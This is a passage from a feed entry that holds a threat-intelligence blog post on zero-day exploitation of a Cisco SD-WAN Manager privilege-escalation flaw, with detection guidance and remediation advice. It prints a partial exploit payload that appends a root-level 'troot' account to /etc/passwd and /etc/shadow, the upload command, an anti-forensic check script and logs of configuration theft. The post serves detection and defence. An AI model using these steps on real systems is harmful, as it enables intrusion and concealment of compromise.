&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 8: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;su&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; logins&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4 style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Exploitation of CVE-2026-20245&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Monitor script logs (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/log/scripts.log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) for execution anomalies involving unauthorized execution of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vconfd_script_upload_tenant_list.sh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Jan 01 08:01:05 vManage vScript: Tenant list upload per vsmart serial number: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/evil_tenant.csv vpn 0
Jan 01 08:01:05 vManage vScript: uploading tenant list via VPN 0 true
Jan 01 08:01:05 vManage vScript: Copying ... /home/admin/evil_tenant.csv via VPN 0
Jan 01 08:01:05 vManage vScript: Successfully loaded the tenant placement file&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 9: Execution anomalies&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Defenders can also query active command execution history using show history within the Viptela CLI for the specific administrative upload commands:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;01-01 08:01:05 -- request tenant-upload tenant-list /home/admin/evil_tenant.csv vpn 0&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 10: Command execution&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Google Security Operations (SecOps)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Privileged Account Append to Passwd Database&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Grep Privileged User Account Discovery in Passwd or Shadow&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hidden Backup of Sensitive System Files&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Suspicious Copy from Usr Share to User Hidden Directory&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Acknowledgements&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant would like to thank the Cisco Product Security Incident Response Team (PSIRT) for their collaboration and partnership throughout the coordinated disclosure process.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-24T11:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager/</id>
    <title>Zero-Day Exploitation of Vulnerability (CVE-2026-20245) in Cisco Catalyst SD-WAN Manager</title>
    <updated>2026-06-24T11:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Chester Sng, Pete Boonyakarn, Logeswaran Nadarajan&lt;/p&gt;
&lt;hr /&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In early 2026, Mandiant identified a threat actor targeting SD-WAN infrastructure at a service provider. After gaining initial access, the threat actor exploited a zero-day vulnerability (&lt;/span&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20245&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;) in Cisco Catalyst SD-WAN to escalate privileges from a compromised administrative account to root-level access.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The vulnerability stems from the device’s file upload feature lacking the ability to properly filter malicious data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Throughout the intrusion, to maintain operational security and avoid detection, the threat actor consistently employed anti-forensic techniques, selectively deleting and restoring system configuration files that were modified during their activities.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Key Observations&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Rogue Peering and Credential Manipulation&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: In March 2026, a threat actor established initial access via unauthorized peering connections to facilitate Secure Shell (SSH) access. The threat actor used that access to manipulate default account passwords to evade detection&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Exploitation of CVE-2026-20245&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Subsequently, the attacker leveraged a zero-day privilege escalation vulnerability (now tracked as CVE-2026-20245) in Cisco Catalyst SD-WAN Manager to gain root-level access via a malicious CSV upload.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Extensive Anti-Forensic Cleanup&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The threat actor deleted malicious files, reverted configuration changes, and executed a validation script to ensure indicators are purged&lt;/span&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;What is SD-WAN?&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Traditional Wide Area Networks (WANs) rely heavily on physical, proprietary hardware routers to direct traffic. This model is often rigid, complex to scale, and struggles to handle the demands of modern cloud computing.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Software-Defined Wide Area Network (SD-WAN) solves this by decoupling the network’s management and control logic from the underlying physical hardware. Instead of configuring individual routers one by one, a centralized software controller is used to orchestrate the entire network from a single dashboard. SD-WANs are typically used by highly distributed organizations, such as banks, retail corporations, technology services, and healthcare providers, to securely connect multiple remote branch locations directly to central cloud services&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;What is Peering?&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Within an SD-WAN fabric, peering is the logical process of establishing a trusted, authenticated relationship between distinct network components, such as edge routers, regional hubs, and central controllers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before any data can be securely transmitted across the network fabric, these devices must perform a digital handshake. During the peering phase, devices mutually authenticate each other using cryptographic certificates. Once identity and trust are verified, they exchange underlying routing tables and automatically build secure tunnels to facilitate safe data transport. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Additional Vulnerabilities in Cisco Catalyst SD-WAN Controllers&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20127&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20182&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are critical vulnerabilities recently disclosed by Cisco that affect the peering authentication mechanism for Cisco Catalyst SD-WAN controllers. Both vulnerabilities could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Intrusion Campaign Overview&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Initial Access Via Rogue Peering Connections&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;From late 2025 to January 2026, Mandiant observed multiple unauthorized peering connections to the victim’s SD-WAN Manager devices. It is possible that these connections occurred due to the exploitation of CVE-2026-20127 or CVE-2026-20182 as the vulnerabilities were not disclosed, and patches were not available during this period&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Beginning in March 2026, further unauthorized peering connections were seen on a device running a software version unaffected by CVE-2026-20127. However, Cisco confirmed that these connections did not leverage CVE-2026-20182 either, and could instead be using stolen certificate material from a previous compromise of the same device.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It is unclear if the same threat actor was responsible for the late 2025 to January 2026 and March 2026 rogue peering activity. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Successful Authentications By Altering The Admin Account Password&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In March 2026, the threat actor established new rogue peer connections and successfully authenticated to the SD-WAN Manager device via SSH using the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vmanage-admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account on the same victim devices.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once authenticated via SSH, the threat actor executed commands to change the password of the default &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account. The threat actor authenticated directly to the SD-WAN Manager web application interface using the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account and exfiltrated configurations of the SD-WAN fabric.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;[2026-03-07T01:31:48.464Z]"POST /j_security_check HTTP/1.1" 200 - 31 0 1288 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:49.017Z] "GET /dataservice/system/device/vedges HTTP/1.1" 200 - 0 10114 127 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:50.017Z] "GET /dataservice/system/device/controllers HTTP/1.1" 200 - 0 15815 100 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:51.925Z] "GET /dataservice/template/config/attached/&amp;lt;Device ID&amp;gt; HTTP/1.1" 200 - 0 3732 18 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:52.493Z] "GET /dataservice/template/config/running/&amp;lt;Device ID&amp;gt; HTTP/1.1" 400 - 0 134 19 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
&amp;lt;...&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 1: Threat actor authentication and configuration extraction&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The threat actor subsequently used their active &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vmanage-admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; session to change the password of the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account back to its original state before terminating their active session. This activity was likely performed to reduce the probability of detection by an administrator trying to log into the device during day-to-day operations&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vmanage-admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; accounts are default accounts on Cisco Catalyst SD-WAN controllers that have different privileges, but &lt;/span&gt;&lt;a href="https://www.cisco.com/c/en/us/td/docs/routers/sdwan/17-x/systems-interfaces/systems-interfaces-guide-17-x/users-and-access.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;neither possesses root shell access&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Exploitation of CVE-2026-20245 to Escalate Privileges&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;After establishing an SSH session with the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account, the threat actor exploited CVE-2026-20245 by executing the following command to upload a file named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;evil_tenant.csv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;request tenant-upload tenant-list /home/admin/evil_tenant.csv vpn 0&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 2: Malicious file upload&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20245&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a vulnerability reported to Cisco by Mandiant, exists in the command-line interface (CLI) of Cisco Catalyst SD-WAN Controllers that could allow an authenticated, local attacker to execute arbitrary commands as root by supplying a crafted file to the affected system.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;evil_tenant.csv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file contains the exploit payload. The following code block (Figure 3) shows a snippet of the exploit which attempts to append malicious entries to the system's &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/passwd&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/shadow&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;if [ -e /usr/share/viptela/vbond_vsmart_tenant_list ] &amp;amp;&amp;amp; grep -q '&amp;lt;redacted&amp;gt;' /usr/share/viptela/vbond_vsmart_tenant_list 2&amp;gt;/dev/null; then
    echo absent &amp;gt; /home/admin/.orig_vbond_vsmart_tenant_list.state;
elif [ -e /usr/share/viptela/vbond_vsmart_tenant_list ]; then
    echo present &amp;gt; /home/admin/.orig_vbond_vsmart_tenant_list.state;
    cp -a /usr/share/viptela/vbond_vsmart_tenant_list /home/admin/.orig_vbond_vsmart_tenant_list;
else
    echo absent &amp;gt; /home/admin/.orig_vbond_vsmart_tenant_list.state;
fi;
cp -a /etc/passwd /home/admin/.orig_passwd;
cp -a /etc/shadow /home/admin/.orig_shadow;
grep -q '^troot:' /etc/passwd || echo 'troot:x:0:0:root:/root:/bin/bash' &amp;gt;&amp;gt; /etc/passwd;
grep -q '^troot:' /etc/shadow || echo 'troot:&amp;lt;redacted&amp;gt;:19000:0:99999:7:::' &amp;gt;&amp;gt; /etc/shadow&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 3: Appending malicious entries&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Through this command, the threat actor achieved the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backed up the original &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vbond_vsmart_tenant_list&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; configuration file, which would have been overwritten by the contents of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;evil_tenant.csv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; during the exploit. This backup was likely created to allow the actor to restore the file later, ensuring the SD-WAN Manager device did not load an invalid configuration that might alert administrators.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Created backups of the original &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/passwd&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/shadow&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Created a user account named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;troot&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with full root privileges.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant subsequently observed the threat actor accessing this new &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;troot&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account from the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account via the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;su&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (substitute user) command.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Anti-Forensic Techniques&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant identified that the threat actor deleted all files they created, including &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;evil_tenant.csv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and restored any system configurations they modified. These deletion and modifications were done to minimize their forensic footprint&lt;/span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition to this, Mandiant also observed execution of a validation script, which checks if indicators of the threat actor's activities are removed. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;for f in /home/admin/evil_tenant.csv /home/admin/.orig_vbond_vsmart_tenant_list /home/admin/.orig_vbond_vsmart_tenant_list.state /home/admin/.orig_passwd /home/admin/.orig_shadow; 
    do if [ -e "$f" ]; 
        then echo PRESENT:$f; ls -ld "$f"; 
        else echo ABSENT:$f; 
    fi; 
done; 

if grep -q '^troot:' /etc/passwd; 
    then echo PRESENT:/etc/passwd:troot; 
    else echo ABSENT:/etc/passwd:troot; 
fi; 

if [ -e /usr/share/viptela/vbond_vsmart_tenant_list ]; 
    then echo PRESENT:/usr/share/viptela/vbond_vsmart_tenant_list; ls -ld /usr/share/viptela/vbond_vsmart_tenant_list; 
    else echo ABSENT:/usr/share/viptela/vbond_vsmart_tenant_list; 
fi&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 4: Validation script&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This script checks for the presence of the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Threat actor-created files in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin.&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;troot&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account in the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;passwd&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;shadow&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;vbond_vsmart_tenant_list&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and if it exists, inspect information about the file. This is likely to check if the original file was restored.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Outlook and Implications&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This campaign underscores the living off the edge paradigm, where threat actors prioritize the compromise of network appliances to bypass traditional security perimeters. As organizations increasingly adopt software-defined networking, the orchestrators managing these environments become primary targets. These devices offer a black box environment for threat actors: they often lack the telemetry required for deep forensic analysis, and their role as a central control plane provides a stealthy platform for persistent, wide-scale access to internal enterprise traffic. For state-sponsored actors, the ability to exploit zero-day vulnerabilities in these platforms remains a premier vector for long-term strategic intelligence collection. Google Threat Intelligence Group (GTIG) has &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/zero-days-exploited-2022"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;closely&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/2023-zero-day-trends"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tracked&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/2024-zero-day-trends"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;and&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;reported&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on increased zero-day exploitation of edge devices over the past several years.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Remediation and Hardening&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Perform IOC Sweep / Threat Hunting:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Collect logs and diagnostic data from SD-WAN devices by executing &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;request admin-tech&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; command on all control-plane components. Scan these collections for known IOCs and execute threat hunts focused on the TTPs identified in the Detections and Hunting section of this blog post. If true positive hits are observed, perform a full investigation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Manual Remediation Support:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; As per Cisco’s guidance, any confirmed indicators of compromise or suspicious activity should be forwarded to &lt;/span&gt;&lt;a href="https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cisco Technical Assistance Center (TAC)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for comprehensive review and remediation assistance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prioritize Immediate Patching and Upgrades:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Organizations must prioritize upgrading Cisco Catalyst SD-WAN Manager to fixed software releases, specifically versions 20.9.9.2, 20.12.7.2, 20.15.4.5, 20.15.5.3, 20.18.3.1, 26.1.1.2, or later, to remediate &lt;/span&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20245&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
